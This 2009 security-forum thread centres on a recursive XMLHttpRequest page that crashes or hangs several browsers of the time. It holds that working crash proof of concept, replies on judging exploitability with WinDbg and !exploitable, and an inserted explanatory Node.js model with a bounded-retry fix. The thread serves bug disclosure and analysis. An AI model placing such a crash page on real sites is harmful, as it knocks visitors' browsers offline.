Sla.ckers.org
How do we crash systems, browsers, or otherwise bring things to a halt, and how do we protect those things? 
Cycled XMLHttpRequest bug
Posted by: p0dge
Date: July 29, 2009 03:37AM

I've found a bug with cycled asynchronous XMLHttp requests in different browsers. If you create an HTML page with the following code
<html>
<head>
<script>
    // Returns an XMLHttpRequest object: the IE ActiveX variants are tried first,
    // then the native XMLHttpRequest (Firefox, Opera, Safari, Chrome).
    function getXmlHttp() {
        var xmlhttp;
        try {
            xmlhttp = new ActiveXObject("Msxml2.XMLHTTP");
        } catch (e) {
            try {
                xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");
            } catch (E) {
                xmlhttp = false;
            }
        }
        if (!xmlhttp && typeof XMLHttpRequest != 'undefined') {
            xmlhttp = new XMLHttpRequest();
        }
        return xmlhttp;
    }
</script>
<script>
    // Synchronous request to a URL that does not exist ('drupal' answers 404).
    // On 404 the function calls itself again before the current call has
    // returned, so every retry adds a stack frame and the recursion never ends.
    function getXmlHttpHACK() {
        var xmlhttp = getXmlHttp();
        xmlhttp.open('GET', 'drupal', false);
        xmlhttp.send(null);
        if (xmlhttp.status == 404) {
            getXmlHttpHACK();
        }
    }
</script>
<script>
    // Entry point: one asynchronous request whose completion handler starts
    // the unbounded synchronous retry loop above.
    var xmlhttp = getXmlHttp();
    xmlhttp.open('GET', 'drupal', true);
    xmlhttp.onreadystatechange = function() {
        if (xmlhttp.readyState == 4) {
            if (xmlhttp.status == 404) {
                getXmlHttpHACK();
            }
        }
    };
    xmlhttp.send(null);
</script>
</head>
</html>
and open it, you will see how different browsers begin to devour system resources.

- Internet Explorer 7/8 shows a message "Stack overflow at line:23" and stops page loading
- Firefox 3.5 and Chrome handle this correctly
- Opera 10 crashes
- Apple Safari hangs

I'm not strong in browser vulnerabilities, so I want to know if this is a simple crash bug or a buffer overflow which allows running shellcode.



Edited 1 time(s). Last edit at 07/29/2009 03:43AM by p0dge.

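The following is an added example and not code from the original post: a Node.js model of the posted page's retry loop, with XMLHttpRequest replaced by a constructed stand-in that always answers 404 (as the missing 'drupal' URL did for the author) so it runs offline. It shows why the synchronous variant exhausts the call stack, what a correctly guarded JavaScript engine does about it (a RangeError thrown by the engine, which is the "handles this correctly" behaviour the post reports for Firefox 3.5 and Chrome), and the bounded, loop-driven form of the retry that a page should use instead. Function names and the backoff are assumptions for illustration.

```javascript
// Added example, not from the original post. XMLHttpRequest is replaced by a
// constructed stand-in so the code runs offline; the permanent 404 mirrors the
// missing 'drupal' URL in the posted page.
function fakeSyncRequest(url) {
  fakeSyncRequest.calls = (fakeSyncRequest.calls || 0) + 1;
  return { status: 404, url };
}

// Model of getXmlHttpHACK(): the synchronous request completes inside the
// current frame, the 404 branch calls the function again, and nothing unwinds.
// Every retry is one more stack frame, so with a permanent 404 the recursion
// depth is unbounded.
function unboundedRetry(request, url, depth = 0) {
  const resp = request(url);
  if (resp.status === 404) {
    return unboundedRetry(request, url, depth + 1);
  }
  return depth;
}

// What a correctly guarded engine does with that: it throws RangeError
// ("Maximum call stack size exceeded") at a depth limit it controls, so the
// script stops and no native stack is overrun. That is a denial of service
// against the page, not a memory-corruption primitive; a browser that crashes
// or hangs instead has a defect in that guard, which is the part worth triaging.
function probeStackOverflow(url) {
  fakeSyncRequest.calls = 0;
  try {
    unboundedRetry(fakeSyncRequest, url);
    return { overflowed: false, retries: fakeSyncRequest.calls };
  } catch (e) {
    return { overflowed: e instanceof RangeError, retries: fakeSyncRequest.calls };
  }
}

// Hardened form: retry from a loop with an attempt limit instead of from inside
// the still-open call. Stack depth stays constant and a permanent 404 costs
// exactly maxAttempts requests.
function boundedRetry(request, url, maxAttempts) {
  for (let attempt = 1; attempt <= maxAttempts; attempt++) {
    const resp = request(url);
    if (resp.status !== 404) {
      return { ok: true, attempts: attempt, status: resp.status };
    }
  }
  return { ok: false, attempts: maxAttempts, status: 404 };
}

// Asynchronous form for the browser case: `request` returns a Promise (what an
// async XMLHttpRequest or fetch gives you), and every retry is rescheduled
// through a timer, so control returns to the event loop between attempts and
// the page stays responsive. The delayMs * attempt backoff is an assumption.
function asyncBoundedRetry(request, url, maxAttempts, delayMs) {
  return new Promise((resolve) => {
    const tryOnce = (attempt) => {
      request(url).then((resp) => {
        if (resp.status !== 404) {
          resolve({ ok: true, attempts: attempt, status: resp.status });
        } else if (attempt >= maxAttempts) {
          resolve({ ok: false, attempts: attempt, status: 404 });
        } else {
          setTimeout(() => tryOnce(attempt + 1), delayMs * attempt);
        }
      });
    };
    tryOnce(1);
  });
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(probeStackOverflow('drupal'));
  console.log(boundedRetry(fakeSyncRequest, 'drupal', 5));
}
```

Running the file prints `{ overflowed: true, retries: <several thousand> }` for the synchronous model and `{ ok: false, attempts: 5, status: 404 }` for the bounded one. The difference between the two is the whole bug: retrying from inside the call that has not yet returned turns a server-side 404 into unbounded stack growth, while retrying from a loop (or from a timer in the async case) makes the cost a fixed number of requests.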
Re: Cycled XMLHttpRequest bug
Posted by: p0deje
Date: July 29, 2009 11:58AM

However, I've reported this as a security issue to the browser companies.

P.S. I'm the author of the thread :)

Re: Cycled XMLHttpRequest bug
Posted by: Gareth Heyes
Date: July 29, 2009 12:18PM

Stack overflow isn't exploitable IMHO, if you want to find if a particular crash is exploitable, configure windbg and capture the crash dump. Then install the !exploitable plugin to analyse the data. This will give you a good indication if the crash is exploitable or not.

Windbg tutorial:-
http://www.debuginfo.com/articles/easywindbg.html

!exploitable:-
http://www.codeplex.com/msecdbg

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Re: Cycled XMLHttpRequest bug
Posted by: p0dge
Date: July 30, 2009 02:30AM

Thanks for the links, but I didn't manage to debug the browser and analyze it with !exploitable.

Will try to investigate it later.

Re: Cycled XMLHttpRequest bug
Posted by: p0deje
Date: August 03, 2009 04:23AM

!exploitable didn't manage to determine whether the error is exploitable for IE and Safari,
but for Opera it said "Probably Exploitable".

---------
http://p0deje.blogspot.com
